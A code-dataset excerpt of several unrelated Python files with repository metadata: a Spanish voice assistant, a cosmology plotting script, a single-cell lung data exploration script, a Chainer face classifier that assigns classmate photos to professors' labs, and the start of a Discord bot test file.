#print(voice)\n\nengine.setProperty('rate', 170)\n\n#Función para que el asistente hable\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\n#Bucle para que el asistente simpre este activo\nwhile True:\n #Variable que guarda la hora actual\n hora = datetime.datetime.now().strftime('%I:%M %p') \n \n #Activar y Comprobar que el microfono funcione \n try:\n with sr.Microphone() as source:\n print( name + ' está escuchando...')\n audio = sr.Recognizer().listen(source, phrase_time_limit=5)\n rec = sr.Recognizer().recognize_google(audio, language='es-CO').lower()\n rec = rec.lower()\n\n #Muestra que escuchó el asistente\n print('Escuchó: ' + rec)\n\n# ============ Cómo está ========================== \n if name + ' cómo estás' in rec:\n answers = ['Estoy muy bien, gracias por preguntar', 'Estoy bien', 'Estoy bien, no me quejo']\n talk(random.choice(answers))\n \n# ============= Su nombre ========================== \n elif 'cómo te llamas' in rec or 'cuál es tu nombre' in rec:\n answers = [f'Mi nombre es {name}', f'Me llamo {name}', f'{name}']\n talk(random.choice(answers))\n\n# ============= Contar un poco de ella ========================== \n elif name + ' cuéntame de ti' in rec or name + ' háblame de ti' in rec:\n talk(f'Soy {name}, una asistente a voz, puedo entablar una pequeña conversación y hacer diferentes acciónes que me pidas')\n \n# ============= Contar chistes ========================== \n elif name + ' cuéntame un chiste' in rec or name + ' hazme reír' in rec:\n chiste = pyjokes.get_joke('es')\n talk(chiste) \n\n#============== Piedra, papel o tijera ==========================\n elif name + ' piedra papel o tijera' in rec:\n answers = ['Piedra', 'Papel', 'Tijera']\n talk(random.choice(answers))\n\n\n#============= Dice un color ============================\n elif name + ' dime un color' in rec:\n colors = ['Amarillo', 'Rojo', 'Verde', 'Azul', 'Blanco', 'Negro', 'Rosado', 'Morado', 'griss', 'Naranja']\n talk(random.choice(colors))\n\n#============= Dice un número =========================\n elif name + ' dime un número' in rec:\n if 'del' in rec or 'entre' in rec:\n rec = rec.replace(name + ' dime un número del', '')\n rec = rec.replace(name + ' dime un número entre', '')\n rec = rec.replace(name + ' dime un número entre el', '')\n rec = rec.replace(' y el', '')\n rec = rec.replace('el', '')\n rec = rec.replace('al', '')\n\n minnumber = int(rec.split()[0])\n maxnumber = int(rec.split()[1])\n\n talk(random.randint(minnumber, maxnumber))\n #Si usuario dice la cantidad de cifras\n elif 'de' in rec:\n rec = rec.replace('uno', '1')\n rec = rec.replace('dos', '2')\n rec = rec.replace('tres', '3')\n rec = rec.replace('cuatro', '4')\n rec = rec.replace('cinco', '5')\n \n digits=\"\".join(c for c in rec if c.isdecimal())\n digits = int(digits)\n\n minnumber = '1'\n maxnumber = '9'\n\n for cifras in range(1,digits):\n minnumber = minnumber + '0'\n maxnumber = maxnumber + '9'\n \n\n talk(random.randint(int(minnumber),int(maxnumber)))\n #Sino, te dice un número normal entre 1 y 9999\n else:\n talk(random.randint(1, 9999))\n\n\n#=========== Calcular operaciones matematicas ===============================\n elif name +' cuánto es' in rec:\n rec = rec.replace(name, '')\n rec = sm.getResult(rec)\n\n if 'Unable to evaluate equation' in rec:\n talk('No puedo hacer la operación matematica que me pides')\n else:\n talk(rec)\n\n#=========== Día actual ===============================\n elif name +' qué día es hoy' in rec:\n fecha = datetime.datetime.now()\n month = 
(int(datetime.datetime.strftime(fecha,'%m')) - 1)\n day = int(datetime.datetime.strftime(fecha, '%d'))\n day = str(day)\n months_year = ['Enero', 'Febreo', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\n days_week = ['Lunes', 'Martes', 'Miercoles', 'Jueves', 'Viernes', 'Sabado', 'Domingo']\n day_week = int(datetime.datetime.today().weekday())\n\n talk('Hoy es' + days_week[day_week] + day + 'de' + months_year[month])\n \n\n#=========== Mes actual ===============================\n elif name +' qué mes estamos' in rec or name+' qué mes es hoy' in rec:\n fecha = datetime.datetime.now()\n month = (int(datetime.datetime.strftime(fecha,'%m')) - 1)\n months_year = ['Enero', 'Febreo', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\n talk('Estamos en el mes de '+ months_year[month])\n\n#=========== Año actual ===============================\n elif name +' qué año estamos' in rec or name +' qué año es hoy' in rec:\n fecha = datetime.datetime.now()\n year = str(datetime.datetime.strftime(fecha,'%Y'))\n talk('Estamos en el año ' + year)\n\n#============== Calcula edad ========================\n elif name + ' qué edad tengo' in rec or name + ' calcula mi edad' in rec or name + ' puedes calcular mi edad' in rec:\n talk('Claro, por favor dime primero el día, mes y año de nacimiento')\n\n while True:\n try:\n with sr.Microphone() as source:\n print('Escuchando fecha de cumpleaños...')\n audio = sr.Recognizer().listen(source, phrase_time_limit=4)\n rec = sr.Recognizer().recognize_google(audio, language='es-CO').lower()\n rec = rec.lower()\n #======== Se remplazan las letras para solo dejar la fecha de cumpleaños =================\n rec = rec.replace('de', '')\n rec = rec.replace('l', '')\n rec = rec.replace('año', '')\n rec = rec.replace('día', '')\n rec = rec.replace('mes', '')\n\n day = rec.split()[0]\n month = rec.split()[1]\n year = rec.split()[2]\n\n months_year = {'enero':1, 'febrero':2, 'marzo':3, 'abril':4, 'mayo':5, 'junio':6, 'julio':7, 'agosto':8, 'septiembre':9, 'octubre':10, 'noviembre':11, 'diciembre':12}\n\n if month in months_year:\n \n month = months_year[month]\n\n day = int(day)\n month = int(month)\n year = int(year)\n \n try:\n\n fechaNow = datetime.datetime.now()\n monthNow = int(datetime.datetime.strftime(fechaNow,'%m'))\n yearNow = int(datetime.datetime.strftime(fechaNow,'%Y'))\n dayNow = int(datetime.datetime.strftime(fechaNow, '%d'))\n\n except:\n talk('No puedo calcular tu edad con el día o año solicitado')\n #===============Se hace el calculo para la edad con las fechas ==========\n yeardate = (year - yearNow) \n monthdate = (month - monthNow)\n daydate = (day - dayNow)\n \n daydate = str(daydate)\n monthdate = str(monthdate)\n yeardate = str(yeardate)\n #===============Se remplaza signo negativo si la resta es negativa ==========\n yeardate = yeardate.replace('-','')\n monthdate = monthdate.replace('-','')\n daydate = daydate.replace('-','')\n\n monthdate = int(monthdate)\n yeardate = int(yeardate)\n\n # list out keys and values separately\n key_list = list(months_year.keys())\n val_list = list(months_year.values())\n \n # print key with val month\n position = val_list.index(month)\n\n age = yeardate\n\n if month > monthNow:\n age = (age - 1)\n talk(f'Tienes {age} años de edad, faltan {monthdate} meses para tu cumpleaños') \n break\n \n elif month < monthNow: \n talk(f'Tienes {age} años de edad, tu cumpleaños fué el {day} de {key_list[position]}') \n break\n \n 
elif month == monthNow and day > dayNow:\n age = (age - 1)\n talk(f'Tienes {age} años de edad, faltan {daydate} días para tu cumpleaños')\n break\n\n elif month == monthNow and day < dayNow:\n talk(f'Tienes {age} años de edad, tu cumpleaños fue hace {daydate} días')\n break\n\n elif month == monthNow and day == dayNow:\n age\n talk(f'Tienes {age} años de edad, hoy es tu cumpleaños, felicidades')\n break\n\n else:\n talk('No puedo calcular la edad con el mes que me indicas, por favor vuelve a intertar')\n break\n\n except:\n pass\n\n#=== Finaliza el programa diciendo el nombre del asisten más alguna de estas dos palabras \"descansa o finalizar\"==========\n elif name + ' descansa' in rec or name + ' finalizar' in rec:\n break\n\n #=================== sino entiende lo que escucha =========================== \n elif name in rec:\n if len(name) == len(rec):\n answers = ['Hola', 'Dime', 'Sí, dime', 'En qué te puedo ayudar']\n talk(random.choice(answers))\n else:\n answers = ['No entiendo lo que me dices', 'No puedo responder a eso']\n talk(random.choice(answers))\n\n except:\n pass\n\n\n\n", "repo_name": "Dairo-Mazo/Asistente-Alexa", "sub_path": "Asistente_a_voz_Alexa.py", "file_name": "Asistente_a_voz_Alexa.py", "file_ext": "py", "file_size_in_byte": 12431, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": "pyttsx3.init", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 40, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 42, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 43, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 52, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 57, "usage_type": "call"}, {"api_name": "pyjokes.get_joke", "line_number": 65, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 71, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 112, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 115, "usage_type": "call"}, {"api_name": "AVMSpeechMath.getResult", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 130, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 131, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 131, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 136, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 143, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 144, "usage_type": 
"call"}, {"api_name": "datetime.datetime", "line_number": 144, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 151, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 151, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 160, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 162, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 188, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 189, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 189, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 191, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 191, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 261, "usage_type": "call"}]} +{"seq_id": "70144057765", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef a(x, Omega0, h):\n \"\"\"\n Compute the scale factor for a matter-dominated universe. This\n is computed at the parameter x, which is related to time t by a parametric\n equation of sin or sinh depending on whether the universe is open or\n closed. 
For a flat universe, x = t.\n\n The function also returns the corresponding time t, given x.\n\n Note that h must be in inverse time units.\n x is a dimensionless (except in the flat case) parameter, with x >= 0.\n \"\"\"\n H0 = 100 * h\n if Omega0 == 1: # flat\n t = x\n a = (3 * H0 * t / 2) ** (2 / 3)\n else: # open or closed\n b = 1 / 2 * Omega0 / np.abs(1 - Omega0)\n t = 1 / H0 * b / np.sqrt(np.abs(1 - Omega0))\n if Omega0 > 1: # closed\n t *= x - np.sin(x)\n a = b * (1 - np.cos(x))\n else: # open\n t *= np.sinh(x) - x\n a = b * (np.cosh(x) - 1)\n return t, a\n\n\ndef t0(Omega0, h):\n \"\"\"\n Compute the age of a matter-dominated universe given Omega0 and h.\n The units of the age is inverse the units of H0.\n\n These equations were derived in PS2, question 1e.\n \"\"\"\n H0 = 100 * h\n if Omega0 == 1: # flat\n return 2 / (3 * H0)\n\n # in the closed or open case we need to find x0 first\n y = 1 + 2 * (1 - Omega0) / Omega0\n if Omega0 > 1: # closed\n x0 = np.arccos(y)\n else: # open\n x0 = np.arccosh(y)\n\n t0, a0 = a(x0, Omega0, h)\n assert np.isclose(a0, 1) # check that we indeed found the right t0\n return t0\n\n\nif __name__ == \"__main__\":\n HW_DIR = \"../ps2/\"\n h = 7.2e-4 # inverse Giga years\n\n # flat\n omega = 1\n t0_flat = t0(omega, h)\n x = np.linspace(0, 50 + t0_flat, num=100) # x = t, Gyrs\n t_flat, a_flat = a(x, omega, h)\n\n # closed\n omega = 3.0\n t0_closed = t0(omega, h)\n x = np.linspace(0, 2 * np.pi, num=100) # from Big Bang to Big Crunch\n t_closed, a_closed = a(x, omega, h)\n\n # open\n omega = 0.3\n t0_open = t0(omega, h)\n x = np.linspace(0, 3.8, num=100)\n t_open, a_open = a(x, 0.3, h)\n\n # shift time axis by subtracting t0 from t\n t_flat -= t0_flat\n t_closed -= t0_closed\n t_open -= t0_open\n\n plt.figure()\n plt.plot(t_flat, a_flat, label=\"$\\\\Omega_0 = 1$\")\n plt.plot(t_closed, a_closed, label=\"$\\\\Omega_0 = 3.0$\")\n plt.plot(t_open, a_open, label=\"$\\\\Omega_0 = 0.3$\")\n plt.scatter(-t0_flat, 0, c=\"red\", label=\"Big Bang\")\n plt.scatter(-t0_closed, 0, c=\"red\")\n plt.scatter(-t0_open, 0, c=\"red\")\n plt.scatter(\n (t_closed.max() - t0_closed) / 2,\n a_closed.max(),\n c=\"black\",\n label=\"Maximum Expansion\",\n )\n plt.scatter(t_closed.max(), 0, c=\"blue\", label=\"Big Crunch\")\n plt.legend()\n plt.xlabel(\"$t-t_0$ [Gyrs]\")\n plt.ylabel(\"$a$\")\n plt.xlim(-20, 50)\n plt.ylim(-0.1, a_open.max())\n plt.grid()\n plt.savefig(HW_DIR + \"ps2_q1f.eps\")\n", "repo_name": "christianhbye/cosmology", "sub_path": "src/ps2.py", "file_name": "ps2.py", "file_ext": "py", "file_size_in_byte": 2944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.abs", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.arccosh", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}, {"api_name": 
"numpy.pi", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "1176362415", "text": "import scanpy as sc\nimport os\nimport anndata\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scanpy.metrics.specificity.plot import marker_genes_distribution, one_v_max_genelist\nfrom scanpy.metrics.specificity.analysis import specificity_quality_control\nfrom scanpy import metrics\nfrom pathlib import Path\nimport pickle\nimport seaborn as sns\nfrom collections import Counter\n\n\nROOTDIR = r''\nDATA_PATH = r'data/'\n\ntrav_count = pd.read_csv(DATA_PATH + 'krasnow_hlca_10x_UMIs.csv')\ntrav_meta = pd.read_csv(DATA_PATH + 'krasnow_hlca_10x_metadata.csv')\n\nfull_data_dict_path = {'lukassen_par': 'lukassen20_lung_orig.processed.h5ad', # parenchyma\n 'lukassen_AW': 'lukassen20_airway_orig.processed.h5ad', # bronchi, epithelial\n 'madissoon': 'madissoon19_lung.processed.h5ad',\n 'barbry': 
'HCA_Barbry_Grch38_Raw_filter_Norm.h5ad',\n                       'vieira_alv': 'vieira19_Alveoli_and_parenchyma_anonymised.processed.h5ad',\n                       'vieira_bronch': 'vieira19_Bronchi_anonymised.processed.h5ad',\n                       'vieira_nas': 'vieira19_Nasal_anonymised.processed.h5ad',\n                       'travigliani': 'facs_normal_lung_blood_scanpy.20200205.RC4.h5ad',\n                       'trav2': 'droplet_normal_lung_blood_scanpy.20200205.RC4.h5ad'}\n\n\ndef load_full_data(name):\n    return anndata.read_h5ad(DATA_PATH + full_data_dict_path[name])\n\nbarbry = load_full_data('barbry')\nmadissoon = load_full_data('madissoon')\nlukassen_par = load_full_data('lukassen_par')\nlukassen_AW = load_full_data('lukassen_AW')\nvieira_alv = load_full_data('vieira_alv')\nvieira_bronch = load_full_data('vieira_bronch')\nvieira_nas = load_full_data('vieira_nas')\n\ntravigliani = load_full_data('travigliani')\ntrav2 = load_full_data('trav2')\n\n\n\ndef load_obj(name):\n    with open(Path(ROOTDIR).joinpath('data').joinpath(f'{name}.pkl'), 'rb') as f:\n        return pickle.load(f)\n\nMarkers_Barbry = load_obj('Marker_Genes_HCA')\n\ndatas = [barbry, madissoon, lukassen_par, lukassen_AW, vieira_alv, vieira_bronch, vieira_nas]\n\nsummary = pd.DataFrame(columns=('ncells', 'ngenes', 'nCellTypes'), index=('barbry','madissoon','lukassen_par','lukassen_AW','vieira_alv','vieira_bronch','vieira_nas'))\n\ni = 0\n\nfor data in datas :\n    summary.iloc[i, 0] = data.n_obs\n    summary.iloc[i, 1] = data.n_vars\n    summary.iloc[i, 2] = len(Counter(data.obs['CellType']).keys())\n    i += 1\n\n\nvieira_bronch.var[vieira_bronch.var['highly_variable']==True]\nsns.scatterplot(vieira_bronch.obsm['X_umap_hm'][:,0], vieira_bronch.obsm['X_umap_hm'][:,1])\n\nspecificity_quality_control(adata=madissoon,\n                            marker_genes=Markers_Barbry,\n                            partition_key='CellType',\n                            project_dir=r'C:\\Users\\ipmc\\Documents\\Metrics_results\\deprez_markers_vs_datasets\\deprez_vs_madisson',\n                            plot_umap=True)\n\n\n# Celltypes nomenclature\n\ncelltypes = []\ncelltypes.append(list(barbry.obs['CellType'].cat.categories))\ncelltypes.append(list(madissoon.obs['CellType'].cat.categories))\ncelltypes.append(list(lukassen_par.obs['CellType'].cat.categories))\ncelltypes.append(list(lukassen_AW.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_alv.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_bronch.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_nas.obs['CellType'].cat.categories))\n\nto_save = pd.DataFrame(celltypes,index=['barbry','madissoon','lukassen_par','lukassen_AW','vieira_alv','vieira_bronch','vieira_nas']).transpose()\nto_save.to_csv(DATA_PATH + 'CellTypes_compare.csv')\n\n", "repo_name": "AntoineCollin/Spec_notebooks", "sub_path": "explore_datasets.py", "file_name": "explore_datasets.py", "file_ext": "py", "file_size_in_byte": 3589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "anndata.read_h5ad", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 63, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 68, "usage_type": "call"}, {"api_name": "scanpy.metrics.specificity.analysis.specificity_quality_control", "line_number": 70, "usage_type": 
"call"}, {"api_name": "pandas.DataFrame", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "33556925373", "text": "import numpy as np\nimport cv2\nimport os\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nimport pandas as pd\n\nfaceCascade = cv2.CascadeClassifier(\"/Users/nishimurataichi/.pyenv/versions/anaconda3-4.1.0/pkgs/opencv3-3.1.0-py35_0/share/OpenCV/haarcascades/haarcascade_frontalface_alt.xml\")\n\n\ndef cut_out_face():\n img_paths = os.listdir('classmates')\n for img_path in img_paths:\n if '.DS_Store' in img_path:\n continue\n # import ipdb; ipdb.set_trace()\n img = cv2.imread('classmates/' + img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face = faceCascade.detectMultiScale(gray, 1.1, 3)\n if len(face) > 0:\n for rect in face:\n x = rect[0]\n y = rect[1]\n width = rect[2]\n height = rect[3]\n dst = img[y:y + height, x:x + width]\n fixed_dst = cv2.resize(dst, (75, 75))\n new_path = 'classmates_face/' + img_path\n cv2.imwrite(new_path, fixed_dst)\n\n\ndef load_classmates():\n img_paths = os.listdir('classmates_face')\n for img_path in img_paths:\n if '.DS_Store' in img_path:\n continue\n img = cv2.imread('classmates_face/' + img_path)\n yield img_path, img\n\n\ndef img2numpy(fixed_dst):\n '''\n この関数,もっと高速に手順を減らすことができそう\n :return: imgからnumpyへ変換して返す\n '''\n img = np.asarray(fixed_dst, dtype=np.int8)\n r_img = []\n g_img = []\n b_img = []\n\n for i in range(75):\n for j in range(75):\n r_img.append(img[i][j][0])\n g_img.append(img[i][j][1])\n b_img.append(img[i][j][2])\n\n all_ary = r_img + g_img + b_img\n all_np = np.array(all_ary, dtype=np.float32).reshape(3, 5625)\n r, g, b = all_np[0], all_np[1], all_np[2]\n rImg = np.asarray(np.float32(r) / 255.0).reshape(75, 75)\n gImg = np.asarray(np.float32(g) / 255.0).reshape(75, 75)\n bImg = np.asarray(np.float32(b) / 255.0).reshape(75, 75)\n\n rgb = np.asarray([rImg, gImg, bImg]).reshape(1, 3, 75, 75)\n\n return rgb\n\n\nclass SimpleAlex(chainer.Chain):\n def __init__(self):\n super(SimpleAlex, self).__init__(\n conv1 = L.Convolution2D(None, 50, 6, stride=3),\n conv2 = L.Convolution2D(None, 75, 3, pad=1),\n fc1 = L.Linear(None, 200),\n fc2 = L.Linear(None, 11)\n\t\t)\n\n def __call__(self, x):\n h = F.max_pooling_2d(F.relu(self.conv1(x)), 3, stride=1)\n h = F.max_pooling_2d(F.relu(self.conv2(h)), 3, stride=1)\n h = F.dropout(F.relu(self.fc1(h)))\n h = self.fc2(h)\n\n return h\n\nprofessors = {\n 0: 'ito',\n 1: 'inamura',\n 2: 'ushiama',\n 3: 'kimu',\n 4: 'takagi',\n 5: 'ueoka',\n 6: 'oshima',\n 7: 'tomotani',\n 8: 'tsuruno',\n 9: 'fuyuno',\n 10: 'fujihara',\n 11: 'tomimatsu'\n}\n\n\n# cut_out_face()\nif __name__ == '__main__':\n image_names = []\n professor_numbers = []\n\n for img_path, img in load_classmates():\n img = img2numpy(img)\n model = SimpleAlex()\n chainer.serializers.load_npz('geijo_result.npz', model)\n y = model(img)\n y = np.argmax(F.softmax(y).data)\n\n print(y)\n\n image_names.append(img_path)\n professor_numbers.append(professors[y])\n\n all_data = [image_names, professor_numbers]\n\n result = pd.DataFrame(all_data)\n result = result.T\n result.columns = ['学生名', '研究室名']\n result.to_csv('your_fate.csv', index=False)\n\n\n\n\n\n\n\n", "repo_name": "awkrail/GeijoChainer", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 3597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 9, "usage_type": "call"}, {"api_name": 
"os.listdir", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "chainer.Chain", "line_number": 70, "usage_type": "attribute"}, {"api_name": "chainer.links.Convolution2D", "line_number": 73, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 73, "usage_type": "name"}, {"api_name": "chainer.links.Convolution2D", "line_number": 74, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 74, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 75, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 76, "usage_type": "name"}, {"api_name": "chainer.functions.max_pooling_2d", "line_number": 80, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 80, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 80, "usage_type": "call"}, {"api_name": "chainer.functions.max_pooling_2d", "line_number": 81, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 81, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 81, "usage_type": "call"}, {"api_name": "chainer.functions.dropout", "line_number": 82, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 82, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "chainer.serializers.load_npz", "line_number": 111, "usage_type": "call"}, {"api_name": "chainer.serializers", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 113, "usage_type": "call"}, {"api_name": "chainer.functions.softmax", "line_number": 113, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 113, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "9807770883", "text": "import pytest\nfrom unittest.mock import AsyncMock, MagicMock, call\nfrom discord_ritoman.bot.bot import bot\nfrom discord_ritoman.bot.bot_command import GLOBAL_COMMAND_TABLE, bot_command\nfrom discord_ritoman.utils import create_logger\n\nlogger = 
